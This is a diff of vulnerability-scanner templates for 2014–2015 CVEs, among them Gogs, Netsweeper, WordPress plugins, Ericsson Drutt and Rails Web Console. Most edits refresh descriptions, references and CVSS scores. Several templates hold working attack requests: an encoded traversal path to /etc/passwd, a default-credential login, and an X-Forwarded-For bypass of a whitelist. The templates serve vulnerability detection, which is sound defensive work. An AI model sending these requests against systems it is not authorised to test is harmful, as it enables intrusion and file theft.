@@ -18,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-8682.yaml b/cves/2014/CVE-2014-8682.yaml index 54f4490459..79f240dc79 100644 --- a/cves/2014/CVE-2014-8682.yaml +++ b/cves/2014/CVE-2014-8682.yaml @@ -1,22 +1,25 @@ id: CVE-2014-8682 info: - name: Gogs - 'users'/'repos' '?q' SQL Injection - author: dhiyaneshDK + name: Gogs (Go Git Service) - SQL Injection + author: dhiyaneshDK,daffainfo severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. reference: - - http://www.securityfocus.com/bid/71187 + - https://nvd.nist.gov/vuln/detail/CVE-2014-8682 - http://seclists.org/fulldisclosure/2014/Nov/33 - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html - - http://gogs.io/docs/intro/change_log.html - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d - - http://www.exploit-db.com/exploits/35238 + - https://www.exploit-db.com/exploits/35238 - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694 - - http://www.securityfocus.com/archive/1/533995/100/0/threaded - tags: cve,cve2014,sqli,gogs + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2014-8682 + cwe-id: CWE-89 metadata: - shodan-query: 'title:"Sign In - Gogs"' + shodan-query: title:"Sign In - Gogs" + tags: cve,cve2014,sqli,gogs requests: - method: GET @@ -26,11 +29,15 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - '"ok":true' - '"data"' + - '"repolink":"' condition: and - type: status status: - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2014/CVE-2014-8799.yaml b/cves/2014/CVE-2014-8799.yaml index 2fff64b065..b462c7325c 100644 --- a/cves/2014/CVE-2014-8799.yaml +++ b/cves/2014/CVE-2014-8799.yaml @@ -4,10 +4,14 @@ info: name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-8799 - https://www.exploit-db.com/exploits/35346 - https://www.cvedetails.com/cve/CVE-2014-8799 + - https://wordpress.org/plugins/dukapress/changelog/ + classification: + cve-id: CVE-2014-8799 tags: cve,cve2014,wordpress,wp-plugin,lfi requests: @@ -29,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml index 8e73d7da9b..57224692e1 100644 --- a/cves/2014/CVE-2014-9094.yaml +++ b/cves/2014/CVE-2014-9094.yaml @@ -1,11 +1,17 @@ id: CVE-2014-9094 info: - name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + name: WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting author: daffainfo severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." - reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + - http://websecurity.com.ua/7152/ + - http://seclists.org/fulldisclosure/2014/Jul/65 + - http://www.securityfocus.com/bid/68525 + classification: + cve-id: CVE-2014-9094 tags: cve,cve2014,wordpress,xss,wp-plugin requests: @@ -27,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9444.yaml b/cves/2014/CVE-2014-9444.yaml index a80d56cc8a..4a440d1e5c 100644 --- a/cves/2014/CVE-2014-9444.yaml +++ b/cves/2014/CVE-2014-9444.yaml @@ -1,13 +1,17 @@ id: CVE-2014-9444 info: - name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS) + name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting author: daffainfo severity: medium - description: The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability. + description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability. reference: - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 + - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html + - http://www.securityfocus.com/bid/71808 + classification: + cve-id: CVE-2014-9444 tags: cve,cve2014,wordpress,wp-plugin,xss requests: @@ -30,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9606.yaml b/cves/2014/CVE-2014-9606.yaml index 8bf7e31561..6c7ff99c8e 100644 --- a/cves/2014/CVE-2014-9606.yaml +++ b/cves/2014/CVE-2014-9606.yaml @@ -1,16 +1,17 @@ id: CVE-2014-9606 info: - name: Netsweeper 4.0.8 - Cross Site Scripting Injection + name: Netsweeper 4.0.8 - Cross-Site Scripting author: daffainfo severity: medium - description: Multiple cross-site scripting (XSS) vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. + description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9606 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-9606 cwe-id: CWE-79 tags: cve,cve2014,netsweeper,xss @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9607.yaml b/cves/2014/CVE-2014-9607.yaml index 05eab3a640..cdbdffe670 100644 --- a/cves/2014/CVE-2014-9607.yaml +++ b/cves/2014/CVE-2014-9607.yaml @@ -1,16 +1,17 @@ id: CVE-2014-9607 info: - name: Netsweeper 4.0.4 - Cross Site Scripting Injection + name: Netsweeper 4.0.4 - Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter. + description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9607 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-9607 cwe-id: CWE-79 tags: cve,cve2014,netsweeper,xss @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9608.yaml b/cves/2014/CVE-2014-9608.yaml index a79a21d6e2..ecb6d6688a 100644 --- a/cves/2014/CVE-2014-9608.yaml +++ b/cves/2014/CVE-2014-9608.yaml @@ -1,16 +1,17 @@ id: CVE-2014-9608 info: - name: Netsweeper 4.0.3 - Cross Site Scripting Injection + name: Netsweeper 4.0.3 - Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. + description: A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9608 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-9608 cwe-id: CWE-79 tags: cve,cve2014,netsweeper,xss @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9609.yaml b/cves/2014/CVE-2014-9609.yaml index 20cf466ef3..8edbc6409a 100644 --- a/cves/2014/CVE-2014-9609.yaml +++ b/cves/2014/CVE-2014-9609.yaml @@ -4,13 +4,14 @@ info: name: Netsweeper 4.0.8 - Directory Traversal author: daffainfo severity: medium - description: Directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. + description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9609 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2014-9609 cwe-id: CWE-22 tags: cve,cve2014,netsweeper,lfi @@ -24,8 +25,10 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9614.yaml b/cves/2014/CVE-2014-9614.yaml index 6b8daf5b05..b71a33cd9c 100644 --- a/cves/2014/CVE-2014-9614.yaml +++ b/cves/2014/CVE-2014-9614.yaml @@ -4,13 +4,14 @@ info: name: Netsweeper 4.0.5 - Default Weak Account author: daffainfo severity: critical - description: The Web Panel in Netsweeper before 4.0.5 has a default password of branding for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. + description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9614 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2014-9614 cwe-id: CWE-798 tags: cve,cve2021,netsweeper,default-login @@ -21,8 +22,8 @@ requests: POST /webadmin/auth/verification.php HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: {{BaseURL}}/webadmin/start/ + login=branding&password=branding&Submit=Login matchers-condition: and @@ -42,3 +43,5 @@ requests: part: header words: - 'Set-Cookie: webadminU=' + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9615.yaml b/cves/2014/CVE-2014-9615.yaml index 1f9852ee16..e79a758026 100644 --- a/cves/2014/CVE-2014-9615.yaml +++ b/cves/2014/CVE-2014-9615.yaml @@ -1,16 +1,17 @@ id: CVE-2014-9615 info: - name: Netsweeper 4.0.4 - Cross Site Scripting Injection + name: Netsweeper 4.0.4 - Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php. + description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9615 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-9615 cwe-id: CWE-79 tags: cve,cve2014,netsweeper,xss @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9617.yaml b/cves/2014/CVE-2014-9617.yaml index eae4068902..27037cadac 100644 --- a/cves/2014/CVE-2014-9617.yaml +++ b/cves/2014/CVE-2014-9617.yaml @@ -4,13 +4,14 @@ info: name: Netsweeper 3.0.6 - Open Redirection author: daffainfo severity: medium - description: Netsweeper version 3.0.6 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability. + description: An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9617 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-9617 cwe-id: CWE-601 tags: cve,cve2014,netsweeper,redirect @@ -25,3 +26,5 @@ requests: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-9618.yaml b/cves/2014/CVE-2014-9618.yaml index 0fc0c1d536..189837b5af 100644 --- a/cves/2014/CVE-2014-9618.yaml +++ b/cves/2014/CVE-2014-9618.yaml @@ -1,16 +1,19 @@ id: CVE-2014-9618 info: - name: Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation) + name: Netsweeper - Authentication Bypass author: daffainfo severity: critical - description: The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL. + description: | + The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9618 + - https://www.exploit-db.com/exploits/37933/ + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2014-9618 cwe-id: CWE-287 tags: cve,cve2014,netsweeper,auth-bypass @@ -33,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2015/CVE-2015-0554.yaml b/cves/2015/CVE-2015-0554.yaml new file mode 100644 index 0000000000..80943c3214 --- /dev/null +++ b/cves/2015/CVE-2015-0554.yaml @@ -0,0 +1,34 @@ +id: CVE-2015-0554 + +info: + name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure + author: daffainfo + severity: high + description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. + reference: + - https://www.exploit-db.com/exploits/35721 + - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 + - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html + - http://www.exploit-db.com/exploits/35721 + classification: + cve-id: CVE-2015-0554 + tags: cve,cve2015,pirelli,router,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/wlsecurity.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var wpapskkey" + - "var WscDevPin" + - "var sessionkey" + condition: and + + - type: status + status: + - 200 diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index 52ad59227d..5b40f010c9 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml @@ -4,15 +4,17 @@ info: name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) author: daffainfo severity: high + description: Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin reference: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 + - http://www.vapidlabs.com/advisory.php?v=154 + - http://www.securityfocus.com/bid/94495 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2015-1000012 cwe-id: CWE-200 - description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin" tags: cve,cve2015,wordpress,wp-plugin,lfi requests: @@ -24,7 +26,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: diff --git a/cves/2015/CVE-2015-1427.yaml b/cves/2015/CVE-2015-1427.yaml index 79427e3ba5..b77948b2a0 100644 --- a/cves/2015/CVE-2015-1427.yaml +++ b/cves/2015/CVE-2015-1427.yaml @@ -1,14 +1,18 @@ id: CVE-2015-1427 info: - name: ElasticSearch 1.4.0/1.4.2 RCE + name: ElasticSearch - Remote Code Execution author: pikpikcu severity: critical - description: The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script. + description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine. reference: - https://blog.csdn.net/JiangBuLiu/article/details/94457980 - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/ - tags: cve,cve2015,elastic,rce + - https://nvd.nist.gov/vuln/detail/CVE-2015-1427 + - http://www.securityfocus.com/bid/72585 + classification: + cve-id: CVE-2015-1427 + tags: cve,cve2015,elastic,rce,elasticsearch requests: - raw: @@ -22,6 +26,7 @@ requests: { "name": "test" } + - | POST /_search HTTP/1.1 Host: {{Hostname}} @@ -45,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2015/CVE-2015-1503.yaml b/cves/2015/CVE-2015-1503.yaml index e14c5aac2d..380c04fc63 100644 --- a/cves/2015/CVE-2015-1503.yaml +++ b/cves/2015/CVE-2015-1503.yaml @@ -1,4 +1,5 @@ id: CVE-2015-1503 + info: name: IceWarp Mail Server Directory Traversal author: 0x_Akoko @@ -8,12 +9,13 @@ info: - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html - http://www.icewarp.com - https://nvd.nist.gov/vuln/detail/CVE-2015-1503 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1503 cwe-id: CWE-200 - tags: cve,cve2015,icewarp,lfi + tags: cve,cve2015,icewarp,lfi,mail requests: - method: GET diff --git a/cves/2015/CVE-2015-1880.yaml b/cves/2015/CVE-2015-1880.yaml index 9f2f2a251d..9260f68085 100644 --- a/cves/2015/CVE-2015-1880.yaml +++ b/cves/2015/CVE-2015-1880.yaml @@ -8,6 +8,10 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page + - http://www.fortiguard.com/advisory/FG-IR-15-005/ + - http://www.securityfocus.com/bid/74652 + classification: + cve-id: CVE-2015-1880 tags: cve,cve2015,xss,fortigates,ssl requests: @@ -30,4 +34,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/cves/2015/CVE-2015-2067.yaml b/cves/2015/CVE-2015-2067.yaml index 5e4ba266b4..be886e0f23 100644 --- a/cves/2015/CVE-2015-2067.yaml +++ b/cves/2015/CVE-2015-2067.yaml @@ -8,7 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/35996 - https://nvd.nist.gov/vuln/detail/CVE-2015-2067 - tags: cve,cve2015,lfi,magento + - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html + classification: + cve-id: CVE-2015-2067 + tags: cve,cve2015,lfi,magento,magmi,plugin requests: - method: GET @@ -20,7 +23,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2015/CVE-2015-2068.yaml b/cves/2015/CVE-2015-2068.yaml index bf1270a2d5..2a77b1f7f0 100644 --- a/cves/2015/CVE-2015-2068.yaml +++ b/cves/2015/CVE-2015-2068.yaml @@ -8,7 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/35996 - https://nvd.nist.gov/vuln/detail/CVE-2015-2068 - tags: cve,cve2015,magento,xss + - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html + classification: + cve-id: CVE-2015-2068 + tags: cve,cve2015,magento,magmi,xss,plugin requests: - method: GET diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index 67ed7522de..41ba31406e 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -1,21 +1,21 @@ id: CVE-2015-2080 info: - name: Eclipse Jetty Remote Leakage + name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage author: pikpikcu severity: high + description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header. reference: - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html - description: | - The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak - tags: cve,cve2015,jetty + - https://nvd.nist.gov/vuln/detail/CVE-2015-2080 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2015-2080 cwe-id: CWE-200 + tags: cve,cve2015,jetty requests: - method: POST @@ -33,3 +33,5 @@ requests: words: - "Illegal character 0x0 in state" part: body + +# Enhanced by mp on 2022/04/21 diff --git a/cves/2015/CVE-2015-2166.yaml b/cves/2015/CVE-2015-2166.yaml new file mode 100644 index 0000000000..dedb5e6276 --- /dev/null +++ b/cves/2015/CVE-2015-2166.yaml @@ -0,0 +1,31 @@ +id: CVE-2015-2166 + +info: + name: Ericsson Drutt MSDP (Instance Monitor) Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI. + reference: + - https://www.exploit-db.com/exploits/36619 + - https://nvd.nist.gov/vuln/detail/CVE-2015-2166 + - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html + - http://www.securityfocus.com/bid/73901 + classification: + cve-id: CVE-2015-2166 + tags: cve,cve2015,lfi,ericsson + +requests: + - method: GET + path: + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml index b39565c245..9bd8bf9979 100644 --- a/cves/2015/CVE-2015-2807.yaml +++ b/cves/2015/CVE-2015-2807.yaml @@ -4,11 +4,15 @@ info: name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter. reference: - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 + - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ + - https://wordpress.org/plugins/navis-documentcloud/changelog/ + classification: + cve-id: CVE-2015-2807 tags: cve,cve2015,wordpress,wp-plugin,xss - description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-3224.yaml b/cves/2015/CVE-2015-3224.yaml new file mode 100644 index 0000000000..f21f392d84 --- /dev/null +++ b/cves/2015/CVE-2015-3224.yaml @@ -0,0 +1,43 @@ +id: CVE-2015-3224 + +info: + name: Ruby on Rails Web Console - Remote Code Execution + author: pdteam + severity: critical + description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. + reference: + - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ + - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ + - https://hackerone.com/reports/44513 + - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 + classification: + cve-id: CVE-2015-3224 + tags: cve,cve2015,rce,rails,ruby + +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + headers: + X-Forwarded-For: ::1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Rails.root:" + - "Action Controller: Exception caught" + condition: and + + - type: word + part: response + words: + - "X-Web-Console-Session-Id" + - "data-remote-path=" + - "data-session-id=" + case-insensitive: true + condition: or + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml index da62b75d4c..18a0e85813 100644 --- a/cves/2015/CVE-2015-3306.yaml +++ b/cves/2015/CVE-2015-3306.yaml @@ -4,9 +4,15 @@ info: name: ProFTPd RCE author: pdteam severity: high - reference: https://github.com/t0kx/exploit-CVE-2015-3306 description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. - tags: cve,cve2015,ftp,rce,network + reference: + - https://github.com/t0kx/exploit-CVE-2015-3306 + - 